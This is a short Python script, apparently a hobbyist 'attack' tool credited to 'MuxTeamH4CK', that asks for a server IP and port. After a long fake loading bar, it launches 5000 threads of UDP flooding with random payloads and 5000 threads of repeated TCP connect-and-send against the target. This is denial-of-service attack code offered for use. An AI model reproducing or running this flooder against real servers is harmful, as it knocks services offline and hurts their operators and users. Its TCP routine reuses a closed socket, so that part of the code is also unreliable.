import time
import os
import socket
import threading

def udpflood(ip, port):
  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  raw = os.urandom(2000)
  payload = b'\xfe' + raw
  while True:
    s.sendto(payload, (ip, port))

def tcpflood(ip, port):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  raw = os.urandom(2000)
  while True:
    s.connect((ip, port))
    s.send(raw)
    time.sleep(0)
    s.close()
os.system("clear")
print("MuxTeamH4CK x ATTACK")
print("\033[1;34m")
print("Teams: EnderBob x ItzMuxGamer")
print(" ")
time.sleep(0)
ip = input("Server IP: ")
port = int(input("Server Port: "))
time.sleep(0)
os.system("clear")
print("|======================|")
print("|Connecting To Server  |")
print("|======================|")
time.sleep(2)
print("|Loading: 1%           |")
time.sleep(0)
print("|Loading: 2%           |")
time.sleep(0)
print("|Loading: 3%           |")
time.sleep(0)
print("|Loading: 4%           |")
time.sleep(0)
print("|Loading: 5%           |")
time.sleep(0)
print("|Loading: 6%           |")
time.sleep(0)
print("|Loading: 7%           |")
time.sleep(0)
print("|Loading: 8%           |")
time.sleep(0)
print("|Loading: 9%           |")
time.sleep(0)
print("|Loading: 10%          |")
time.sleep(0)
print("|Loading: 11%          |")
time.sleep(0)
print("|Loading: 12%          |")
time.sleep(0)
print("|Loading: 13%          |")
time.sleep(0)
print("|Loading: 14%          |")
time.sleep(0)
print("|Loading: 15%          |")
time.sleep(0)
print("|Loading: 16%          |")
time.sleep(0)
print("|Loading: 17%          |")
time.sleep(0)
print("|Loading: 18%          |")
time.sleep(0)
print("|Loading: 19%          |")
time.sleep(0)
print("|Loading: 20%          |")
time.sleep(0)
print("|Loading: 21%          |")
time.sleep(0)
print("|Loading: 22%          |")
time.sleep(0)
print("|Loading: 23%          |")
time.sleep(0)
print("|Loading: 24%          |")
time.sleep(0)
print("|Loading: 25%          |")
time.sleep(0)
print("|Loading: 26%          |")
time.sleep(0)
print("|Loading: 27%          |")
time.sleep(0)
print("|Loading: 28%          |")
time.sleep(0)
print("|Loading: 29%          |")
time.sleep(0)
print("|Loading: 30%          |")
time.sleep(0)
print("|Loading: 31%          |")
time.sleep(0)
print("|Loading: 32%          |")
time.sleep(0)
print("|Loading: 33%          |")
time.sleep(0)
print("|Loading: 34%          |")
time.sleep(0)
print("|Loading: 35%          |")
time.sleep(0)
print("|Loading: 36%          |")
time.sleep(0)
print("|Loading: 37%          |")
time.sleep(0)
print("|Loading: 38%          |")
time.sleep(0)
print("|Loading: 39%          |")
time.sleep(0)
print("|Loading: 40%          |")
time.sleep(0)
print("|Loading: 41%          |")
time.sleep(0)
print("|Loading: 42%          |")
time.sleep(0)
print("|Loading: 43%          |")
time.sleep(0)
print("|Loading: 44%          |")
time.sleep(0)
print("|Loading: 45%          |")
time.sleep(0)
print("|Loading: 46%          |")
time.sleep(0)
print("|Loading: 47%          |")
time.sleep(0)
print("|Loading: 48%          |")
time.sleep(0)
print("|Loading: 49%          |")
time.sleep(0)
print("|Loading: 50%          |")
time.sleep(0)
print("|Loading: 51%          |")
time.sleep(0)
print("|Loading: 52%          |")
time.sleep(0)
print("|Loading: 53%          |")
time.sleep(0)
print("|Loading: 54%          |")
time.sleep(0)
print("|Loading: 55%          |")
time.sleep(0)
print("|Loading: 56%          |")
time.sleep(0)
print("|Loading: 57%          |")
time.sleep(0)
print("|Loading: 58%          |")
time.sleep(0)
print("|Loading: 59%          |")
time.sleep(0)
print("|Loading: 60%          |")
time.sleep(0)
print("|Loading: 61%          |")
time.sleep(0)
print("|Loading: 62%          |")
time.sleep(0)
print("|Loading: 63%          |")
time.sleep(0)
print("|Loading: 64%          |")
time.sleep(0)
print("|Loading: 65%          |")
time.sleep(0)
print("|Loading: 66%          |")
time.sleep(0)
print("|Loading: 67%          |")
time.sleep(0)
print("|Loading: 68%          |")
time.sleep(0)
print("|Loading: 69%          |")
time.sleep(0)
print("|Loading: 70%          |")
time.sleep(0)
print("|Loading: 71%          |")
time.sleep(0)
print("|Loading: 72%          |")
time.sleep(0)
print("|Loading: 73%          |")
time.sleep(0)
print("|Loading: 74%          |")
time.sleep(0)
print("|Loading: 75%          |")
time.sleep(0)
print("|Loading: 76%          |")
time.sleep(0)
print("|Loading: 77%          |")
time.sleep(0)
print("|Loading: 78%          |")
time.sleep(0)
print("|Loading: 79%          |")
time.sleep(0)
print("|Loading: 80%          |")
time.sleep(0)
print("|Loading: 81%          |")
time.sleep(0)
print("|Loading: 82%          |")
time.sleep(0)
print("|Loading: 83%          |")
time.sleep(0)
print("|Loading: 84%          |")
time.sleep(0)
print("|Loading: 85%          |")
time.sleep(0)
print("|Loading: 86%          |")
time.sleep(0)
print("|Loading: 87%          |")
time.sleep(0)
print("|Loading: 88%          |")
time.sleep(0)
print("|Loading: 89%          |")
time.sleep(0)
print("|Loading: 90%          |")
time.sleep(1)
print("|Loading: 91%          |")
time.sleep(1)
print("|Loading: 92%          |")
time.sleep(1)
print("|Loading: 93%          |")
time.sleep(1)
print("|Loading: 94%          |")
time.sleep(1)
print("|Loading: 95%          |")
time.sleep(1)
print("|Loading: 96%          |")
time.sleep(1)
print("|Loading: 97%          |")
time.sleep(1)
print("|Loading: 98%          |")
time.sleep(1)
print("|Loading: 99%          |")
time.sleep(1)
print("|Loading: 100%         |")
time.sleep(1)
print("|======================|")
time.sleep(0)
print("|Server has CONNECTED! |")
print("|======================|")
time.sleep(2)
print(" ")
print("Successfull ATTACK SENT TO Server WITH: HIGH-ATTACK")
print(" ")
print("\033[31m=============================")
print(f"|\033[31mServer IP: {ip}       ")
print(f"|\033[31mServer Port: {port}   ")
print("|Stopped ATTACK: CTRL + Z          ")
print("\033[31m=============================")

for i in range(5000):
  t = threading.Thread(target=udpflood,args=(ip, port), daemon=True)
  t.start()
for i in range(5000):
  t2 = threading.Thread(target=tcpflood,args=(ip, port), daemon=True)
  t2.start()

while True:
  time.sleep(0)
